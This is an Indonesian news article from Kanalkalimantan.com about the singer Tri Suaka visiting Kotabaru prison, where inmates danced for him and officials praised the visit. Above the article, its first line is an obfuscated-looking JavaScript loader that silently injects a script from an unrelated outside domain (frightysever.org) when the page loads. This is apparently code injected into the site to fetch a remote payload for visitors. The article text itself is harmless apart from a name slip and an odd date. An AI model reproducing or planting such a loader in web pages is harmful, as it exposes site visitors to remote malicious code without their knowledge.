(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kotabaru

Tri Suaka Salut Kekeluargaan yang Terbangun di Lapas Kotabaru


KANALKALIMANTAN.COM, KOTABARU – Warga binaan Lembaga Permasyarakat (Lapas) Kelas II A Kotabaru antusias menunggu kedatangan artis yang kini namanya mulai dikenal di kancah permusikan Indonesia yaitu Tri Suara. Pelantun lagu “Aku Bukan Jodohnya” ini sempat viral di akun-akun media sosial khususnya di youtube sehingga membawa namanya sudah banyak dikenal.

Pria kelahiran tahun  1994 ini, menjadi salah satu artis yang banyak digandrungi kaum muda, apalagi perempuan.

Kedatangan Tri Suaka ke Lapas Kotabaru tentunya disambut hangat oleh Kepala Lapas Kotabaru beserta dengan jajarannya. Bahkan, para warga binaan pun tak sabar ingin melihat sosok idola yang selama ini hanya bisa disaksikan mereka melalui televisi.

Sebelum bertolak kembali ke Jogjakarta, warga binaan menyuguhkan tarian khas persatuan yang menjadi ciri khas Lapas Kotabaru dengan filosofi “Membangun Integritas melalui pendekatan seni” di dalam Lapas. Tri Suaka pun diajak menari langsung untuk bisa mengikuti gerakan-gerakannya.

 

Baca juga  : Besok, DPRD Kapuas Bakal Sahkan Dua Raperda

Sontak, suasana didalam Lapas semakin meriah dan tidak sedikit dari petugas yang berfoto bersama untuk mengabadikan moment tersebut.

Salah satu petugas Lapas Kelas II A Kotabaru mengatakan, “kalau Tri Suaka datang ke tempat kita, lebih baik saya urungkan saja berangkat ke Jogjakarta untuk melihat penampilannya,” katanya.

Kepada Kanalkalimantan.com, Tri Suaka mengaku bangga dan senang bisa mengunjungi Lapas yang ada di Kotabaru. Apalagi ia melihat langsung rasa kekeluargaan yang tinggi di tunjukkan oleh para warga binaan.

“Keren, ternyata Lapas Kotabaru ini tidak seram bahkan suasananya seperti berada di dalam asrama, dan rasa kekeluargaannya antar sesama warga binaan dan petugas sangat baik sekali,” ucapnya bangga, Senin (28/11/12).

Disampaikannya juga, warga binaan yang berada di dalam Lapas justru memunculkan spirit yang baik sehingga menimbulkan rasa kekeluargaan yang tinggi.

Baca juga  : Setelah ‘Puasa’ 9 Tahun, Jokowi Pilih Calon Panglima TNI dari Matra Laut

“Sekali lagi, Lapas Kotabaru tidak menyeramkan seperti layaknya Lapas, dan pesan kepada warga binaan harus tetap semangat dan jangan lupa bahagia,” tambahnya.

Sementara Kepala Lapas Kelas II A Kotabaru, Yosef Benyamin Yembise mengatakan, ia sangat berterimakasih dan memberikan apresiasi kepada Tri Suaka yang telah menyempatkan waktunya mengunjungi warga binaannya, dan itu tentunya menjadi penyemangat.

“Bisa kita lihat bersama tadi sebelum Tri Suaka datang, suasana hening mendadak riuh, teriakan dan sorakan dari warga binaan mendadak pecah, dan itu pastinya memberikan motivasi dan semangat bagi warga binaan yang saat ini menjalani pembinaan di dalam Lapas,” tutur Yosef.

Dikatakannya lebih jauh, selain menjabat sebagai Kalapas Kotabaru, ia juga merupakan pembina Persatuan Artis Penyanyi Pencipta Lagu dan Pemusik Republik Indonesia (PAPPRI) Kotabaru, merasa sangat bangga karena permintaannya di penuhi oleh Tri Suaka untuk bisa berhadir langsung mengunjungi warga binaan.

Baca juga  : Dinsos Tanbu Turut Sosialisasikan Soal PPKS Disabilitas dan ODGJ

Disambungnya, Tri Suaka sehari sebelumnya menjadi Guess Star pada acara Meranti Putih Performance Art’s Fest (MP2AF) di Hutan Meranti Kotabaru.

“Sebagai ucapan rasa terimakasih dari keluarga besar Lapas Kotabaru, kami menyerahkan cinderamata berupa Kain Sasirangan, syal dan gantungan kunci berciririkan Ikan Todak sebagai maskot Kabupaten Kotabaru,” pungkasnya. (Kanalkalimantan.com/muhammad)

Reporter : muh
Editor : cell


Desy Arfianty

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

45 menit ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

2 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

3 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

3 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

4 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

6 jam ago

This website uses cookies.